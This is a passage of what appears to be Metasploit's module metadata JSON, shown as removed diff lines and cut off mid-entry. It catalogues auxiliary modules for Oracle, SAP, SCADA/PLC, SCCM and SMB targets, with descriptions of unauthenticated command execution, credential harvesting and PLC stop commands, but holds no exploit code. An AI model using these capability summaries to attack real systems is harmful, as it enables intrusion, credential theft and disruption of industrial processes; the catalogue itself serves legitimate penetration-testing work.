"aliases": [], - "rank": 300, - "disclosure_date": "2009-01-07", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module simply attempts to discover the protected SID.", - "references": [ - "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/", - "URL-http://www.red-database-security.com/scripts/sid.txt" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/oracle/sid_brute.rb", - "is_install_path": true, - "ref_name": "admin/oracle/sid_brute", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/tnscmd": { - "name": "Oracle TNS Listener Command Issuer", - "fullname": "auxiliary/admin/oracle/tnscmd", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-01", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module allows for the sending of arbitrary TNS commands in order\n to gather information.\n Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd", - "references": [], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/tnscmd.rb", - "is_install_path": true, - "ref_name": "admin/oracle/tnscmd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/pop2/uw_fileretrieval": { - "name": "UoW pop2d Remote File Retrieval Vulnerability", - "fullname": "auxiliary/admin/pop2/uw_fileretrieval", - "aliases": [], - "rank": 300, - "disclosure_date": "2000-07-14", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module exploits a vulnerability in the FOLD command of the\n University of Washington ipop2d service. By specifying an arbitrary\n folder name it is possible to retrieve any file which is world or group\n readable by the user ID of the POP account. This vulnerability can only\n be exploited with a valid username and password. The From address is\n the file owner.", - "references": [ - "OSVDB-368", - "BID-1484" - ], - "platform": "", - "arch": "", - "rport": 109, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb", - "is_install_path": true, - "ref_name": "admin/pop2/uw_fileretrieval", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/postgres/postgres_readfile": { - "name": "PostgreSQL Server Generic Query", - "fullname": "auxiliary/admin/postgres/postgres_readfile", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "todb " - ], - "description": "This module imports a file local on the PostgreSQL Server into a\n temporary table, reads it, and then drops the temporary table.\n It requires PostgreSQL credentials with table CREATE privileges\n as well as read privileges to the target file.", - "references": [], - "platform": "", - "arch": "", - "rport": 5432, - "autofilter_ports": [ - 5432 - ], - "autofilter_services": [ - "postgres" - ], - "targets": null, - "mod_time": "2024-02-19 10:57:53 +0000", - "path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb", - "is_install_path": true, - "ref_name": "admin/postgres/postgres_readfile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "postgresql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/postgres/postgres_sql": { - "name": "PostgreSQL Server Generic Query", - "fullname": "auxiliary/admin/postgres/postgres_sql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "todb " - ], - "description": "This module will allow for simple SQL statements to be executed against a\n PostgreSQL instance given the appropriate credentials.", - "references": [ - "URL-https://www.postgresql.org" - ], - "platform": "", - "arch": "", - "rport": 5432, - "autofilter_ports": [ - 5432 - ], - "autofilter_services": [ - "postgres" - ], - "targets": null, - "mod_time": "2024-03-05 17:49:13 +0000", - "path": "/modules/auxiliary/admin/postgres/postgres_sql.rb", - "is_install_path": true, - "ref_name": "admin/postgres/postgres_sql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "postgresql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/registry_security_descriptor": { - "name": "Windows Registry Security Descriptor Utility", - "fullname": "auxiliary/admin/registry_security_descriptor", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Christophe De La Fuente" - ], - "description": "Read or write a Windows registry security descriptor remotely.\n\n In READ mode, the `FILE` option can be set to specify where the\n security descriptor should be written to.\n\n The following format is used:\n ```\n key: \n security_info: \n sd: \n ```\n\n In WRITE mode, the `FILE` option can be used to specify the information\n needed to write the security descriptor to the remote registry. The file must\n follow the same format as described above.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/registry_security_descriptor.rb", - "is_install_path": true, - "ref_name": "admin/registry_security_descriptor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "READ", - "description": "Read a Windows registry security descriptor" - }, - { - "name": "WRITE", - "description": "Write a Windows registry security descriptor" - } - ] - }, - "auxiliary_admin/sap/cve_2020_6207_solman_rce": { - "name": "SAP Solution Manager remote unauthorized OS commands execution", - "fullname": "auxiliary/admin/sap/cve_2020_6207_solman_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-10-03", - "type": "auxiliary", - "author": [ - "Yvan Genuer", - "Pablo Artuso", - "Dmitry Chastuhin", - "Vladimir Ivanov" - ], - "description": "This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of\n SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication\n checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,\n send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.\n\n Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected\n to SolMan as a user from which the SMDAgent service starts, usually the daaadm.", - "references": [ - "CVE-2020-6207", - "URL-https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf", - "URL-https://github.com/chipik/SAP_EEM_CVE-2020-6207" - ], - "platform": "", - "arch": "", - "rport": 50000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb", - "is_install_path": true, - "ref_name": "admin/sap/cve_2020_6207_solman_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "EXEC", - "description": "Exec OS command on connected agent" - }, - { - "name": "LIST", - "description": "List connected agents" - }, - { - "name": "SECSTORE", - "description": "Get file with SolMan credentials from connected agent" - }, - { - "name": "SSRF", - "description": "Send SSRF from connected agent" - } - ] - }, - "auxiliary_admin/sap/cve_2020_6287_ws_add_user": { - "name": "SAP Unauthenticated WebService User Creation", - "fullname": "auxiliary/admin/sap/cve_2020_6287_ws_add_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-07-14", - "type": "auxiliary", - "author": [ - "Pablo Artuso", - "Dmitry Chastuhin", - "Spencer McIntyre" - ], - "description": "This module leverages an unauthenticated web service to submit a job which will create a user with a specified\n role. The job involves running a wizard. After the necessary action is taken, the job is canceled to avoid\n unnecessary system changes.", - "references": [ - "CVE-2020-6287", - "URL-https://github.com/chipik/SAP_RECON", - "URL-https://www.onapsis.com/recon-sap-cyber-security-vulnerability", - "URL-https://us-cert.cisa.gov/ncas/alerts/aa20-195a" - ], - "platform": "", - "arch": "", - "rport": 50000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb", - "is_install_path": true, - "ref_name": "admin/sap/cve_2020_6287_ws_add_user", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "AKA": [ - "RECON" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ADD", - "description": "Add the specified user" - }, - { - "name": "REMOVE", - "description": "Remove the specified user" - } - ] - }, - "auxiliary_admin/sap/sap_configservlet_exec_noauth": { - "name": "SAP ConfigServlet OS Command Execution", - "fullname": "auxiliary/admin/sap/sap_configservlet_exec_noauth", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-01", - "type": "auxiliary", - "author": [ - "Dmitry Chastuhin", - "Andras Kabai" - ], - "description": "This module allows execution of operating system commands through the SAP\n ConfigServlet without any authentication.", - "references": [ - "OSVDB-92704", - "EDB-24963", - "URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf" - ], - "platform": "", - "arch": "", - "rport": 50000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb", - "is_install_path": true, - "ref_name": "admin/sap/sap_configservlet_exec_noauth", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/sap/sap_igs_xmlchart_xxe": { - "name": "SAP Internet Graphics Server (IGS) XMLCHART XXE", - "fullname": "auxiliary/admin/sap/sap_igs_xmlchart_xxe", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-03-14", - "type": "auxiliary", - "author": [ - "Yvan Genuer", - "Vladimir Ivanov" - ], - "description": "This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page\n of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These\n vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when\n submitting a POST request to the XMLCHART page to generate a new chart.\n\n Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user\n from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers\n can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable\n SAP IGS server.", - "references": [ - "CVE-2018-2392", - "CVE-2018-2393", - "URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf" - ], - "platform": "", - "arch": "", - "rport": 40080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb", - "is_install_path": true, - "ref_name": "admin/sap/sap_igs_xmlchart_xxe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "DOS", - "description": "Denial Of Service" - }, - { - "name": "READ", - "description": "Remote file read" - } - ] - }, - "auxiliary_admin/sap/sap_mgmt_con_osexec": { - "name": "SAP Management Console OSExecute", - "fullname": "auxiliary/admin/sap/sap_mgmt_con_osexec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Chris John Riley" - ], - "description": "This module allows execution of operating system commands through the SAP\n Management Console SOAP Interface. A valid username and password must be\n provided.", - "references": [ - "URL-http://blog.c22.cc" - ], - "platform": "", - "arch": "", - "rport": 50013, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443, - 50013 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb", - "is_install_path": true, - "ref_name": "admin/sap/sap_mgmt_con_osexec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/advantech_webaccess_dbvisitor_sqli": { - "name": "Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection", - "fullname": "auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-04-08", - "type": "auxiliary", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The\n vulnerability exists in the DBVisitor.dll component, and can be abused through malicious\n requests to the ChartThemeConfig web service. This module can be used to extract the site\n and project usernames and hashes.", - "references": [ - "CVE-2014-0763", - "ZDI-14-077", - "OSVDB-105572", - "BID-66740", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb", - "is_install_path": true, - "ref_name": "admin/scada/advantech_webaccess_dbvisitor_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/ge_proficy_substitute_traversal": { - "name": "GE Proficy Cimplicity WebView substitute.bcl Directory Traversal", - "fullname": "auxiliary/admin/scada/ge_proficy_substitute_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-22", - "type": "auxiliary", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the\n gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM\n privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.", - "references": [ - "CVE-2013-0653", - "OSVDB-89490", - "BID-57505", - "URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb", - "is_install_path": true, - "ref_name": "admin/scada/ge_proficy_substitute_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/modicon_command": { - "name": "Schneider Modicon Remote START/STOP Command", - "fullname": "auxiliary/admin/scada/modicon_command", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-05", - "type": "auxiliary", - "author": [ - "K. Reid Wightman ", - "todb " - ], - "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to perform administrative commands without authentication.\n This module allows a remote user to change the state of the PLC between\n STOP and RUN, allowing an attacker to end process control by the PLC.\n\n This module is based on the original 'modiconstop.rb' Basecamp module from\n DigitalBond.", - "references": [ - "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" - ], - "platform": "", - "arch": "", - "rport": 502, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/scada/modicon_command.rb", - "is_install_path": true, - "ref_name": "admin/scada/modicon_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/modicon_password_recovery": { - "name": "Schneider Modicon Quantum Password Recovery", - "fullname": "auxiliary/admin/scada/modicon_password_recovery", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-19", - "type": "auxiliary", - "author": [ - "K. Reid Wightman ", - "todb " - ], - "description": "The Schneider Modicon Quantum series of Ethernet cards store usernames and\n passwords for the system in files that may be retrieved via backdoor access.\n\n This module is based on the original 'modiconpass.rb' Basecamp module from\n DigitalBond.", - "references": [ - "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2023-12-16 23:40:30 +0000", - "path": "/modules/auxiliary/admin/scada/modicon_password_recovery.rb", - "is_install_path": true, - "ref_name": "admin/scada/modicon_password_recovery", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/modicon_stux_transfer": { - "name": "Schneider Modicon Ladder Logic Upload/Download", - "fullname": "auxiliary/admin/scada/modicon_stux_transfer", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-05", - "type": "auxiliary", - "author": [ - "K. Reid Wightman ", - "todb " - ], - "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to send and receive ladder logic. The protocol is\n unauthenticated, and allows a rogue host to retrieve the existing\n logic and to upload new logic.\n\n Two modes are supported: \"SEND\" and \"RECV,\" which behave as one might\n expect -- use 'set mode ACTIONAME' to use either mode of operation.\n\n In either mode, FILENAME must be set to a valid path to an existing\n file (for SENDing) or a new file (for RECVing), and the directory must\n already exist. The default, 'modicon_ladder.apx' is a blank\n ladder logic file which can be used for testing.\n\n This module is based on the original 'modiconstux.rb' Basecamp module from\n DigitalBond.", - "references": [ - "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" - ], - "platform": "", - "arch": "", - "rport": 502, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/auxiliary/admin/scada/modicon_stux_transfer.rb", - "is_install_path": true, - "ref_name": "admin/scada/modicon_stux_transfer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/moxa_credentials_recovery": { - "name": "Moxa Device Credential Retrieval", - "fullname": "auxiliary/admin/scada/moxa_credentials_recovery", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-07-28", - "type": "auxiliary", - "author": [ - "Patrick DeSantis ", - "K. Reid Wightman " - ], - "description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.", - "references": [ - "CVE-2016-9361", - "BID-85965", - "URL-https://www.digitalbond.com/blog/2016/10/25/serial-killers/", - "URL-https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02" - ], - "platform": "", - "arch": "", - "rport": 4800, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb", - "is_install_path": true, - "ref_name": "admin/scada/moxa_credentials_recovery", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/multi_cip_command": { - "name": "Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands", - "fullname": "auxiliary/admin/scada/multi_cip_command", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-19", - "type": "auxiliary", - "author": [ - "Ruben Santamarta ", - "K. Reid Wightman ", - "todb " - ], - "description": "The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which\n implements the protocol. This module implements the CPU STOP command, as well as\n the ability to crash the Ethernet card in an affected device.\n\n This module is based on the original 'ethernetip-multi.rb' Basecamp module\n from DigitalBond.", - "references": [ - "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" - ], - "platform": "", - "arch": "", - "rport": 44818, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/scada/multi_cip_command.rb", - "is_install_path": true, - "ref_name": "admin/scada/multi_cip_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/mypro_mgr_creds": { - "name": "mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)", - "fullname": "auxiliary/admin/scada/mypro_mgr_creds", - "aliases": [], - "rank": 300, - "disclosure_date": "2025-02-13", - "type": "auxiliary", - "author": [ - "Michael Heinzl" - ], - "description": "Credential Harvester in MyPRO Manager <= v1.3 from mySCADA.\n The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly veryfing that the associated request is coming from an authenticated and authorized entity.", - "references": [ - "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16", - "CVE-2025-24865", - "CVE-2025-22896" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 34022, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-20 15:40:05 +0000", - "path": "/modules/auxiliary/admin/scada/mypro_mgr_creds.rb", - "is_install_path": true, - "ref_name": "admin/scada/mypro_mgr_creds", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/pcom_command": { - "name": "Unitronics PCOM remote START/STOP/RESET command", - "fullname": "auxiliary/admin/scada/pcom_command", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Luis Rosa " - ], - "description": "Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.", - "references": [ - "URL-https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf" - ], - "platform": "", - "arch": "", - "rport": 20256, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-01-29 16:19:13 +0000", - "path": "/modules/auxiliary/admin/scada/pcom_command.rb", - "is_install_path": true, - "ref_name": "admin/scada/pcom_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/phoenix_command": { - "name": "PhoenixContact PLC Remote START/STOP Command", - "fullname": "auxiliary/admin/scada/phoenix_command", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-05-20", - "type": "auxiliary", - "author": [ - "Tijl Deneut " - ], - "description": "PhoenixContact Programmable Logic Controllers are built upon a variant of\n ProConOS. Communicating using a proprietary protocol over ports TCP/1962\n and TCP/41100 or TCP/20547.\n It allows a remote user to read out the PLC Type, Firmware and\n Build number on port TCP/1962.\n And also to read out the CPU State (Running or Stopped) AND start\n or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series)\n or on port TCP/20547 (confirmed ILC 39x series)", - "references": [ - "URL-https://github.com/tijldeneut/ICSSecurityScripts", - "CVE-2014-9195" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/scada/phoenix_command.rb", - "is_install_path": true, - "ref_name": "admin/scada/phoenix_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/yokogawa_bkbcopyd_client": { - "name": "Yokogawa BKBCopyD.exe Client", - "fullname": "auxiliary/admin/scada/yokogawa_bkbcopyd_client", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-08-09", - "type": "auxiliary", - "author": [ - "Unknown" - ], - "description": "This module allows an unauthenticated user to interact with the Yokogawa\n CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n operations.", - "references": [ - "CVE-2014-5208", - "URL-https://www.rapid7.com/blog/post/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access" - ], - "platform": "", - "arch": "", - "rport": 20111, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-03-10 10:28:25 +0000", - "path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb", - "is_install_path": true, - "ref_name": "admin/scada/yokogawa_bkbcopyd_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "PMODE", - "description": "Leak the current database" - }, - { - "name": "RETR", - "description": "Retrieve remote file" - }, - { - "name": "STOR", - "description": "Store remote file" - } - ] - }, - "auxiliary_admin/sccm/get_naa_credentials": { - "name": "Get NAA Credentials", - "fullname": "auxiliary/admin/sccm/get_naa_credentials", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "xpn", - "skelsec", - "smashery" - ], - "description": "This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.\n This requires a computer account, which can be added using the samr_account module.", - "references": [ - "URL-https://blog.xpnsec.com/unobfuscating-network-access-accounts/", - "URL-https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md", - "URL-https://github.com/Mayyhem/SharpSCCM", - "URL-https://github.com/garrettfoster13/sccmhunter" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-05-05 11:16:35 +0000", - "path": "/modules/auxiliary/admin/sccm/get_naa_credentials.rb", - "is_install_path": true, - "ref_name": "admin/sccm/get_naa_credentials", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/serverprotect/file": { - "name": "TrendMicro ServerProtect File Access", - "fullname": "auxiliary/admin/serverprotect/file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "toto" - ], - "description": "This modules exploits a remote file access flaw in the ServerProtect Windows\n Server RPC service. Please see the action list (or the help output) for more\n information.", - "references": [ - "CVE-2007-6507", - "OSVDB-44318", - "ZDI-07-077" - ], - "platform": "", - "arch": "", - "rport": 5168, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-05-12 22:15:21 +0000", - "path": "/modules/auxiliary/admin/serverprotect/file.rb", - "is_install_path": true, - "ref_name": "admin/serverprotect/file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "delete", - "description": "Delete a file" - }, - { - "name": "download", - "description": "Download a file" - }, - { - "name": "list", - "description": "List files (not recommended - will crash the driver)" - }, - { - "name": "upload", - "description": "Upload a file" - } - ] - }, - "auxiliary_admin/smb/change_password": { - "name": "SMB Password Change", - "fullname": "auxiliary/admin/smb/change_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "smashery" - ], - "description": "Change the password of an account using SMB. This provides several different\n APIs, each of which have their respective benefits and drawbacks.", - "references": [ - "URL-https://github.com/fortra/impacket/blob/master/examples/changepasswd.py" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/smb/change_password.rb", - "is_install_path": true, - "ref_name": "admin/smb/change_password", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "CHANGE", - "description": "Change the password, knowing the existing one. New AES kerberos keys will be 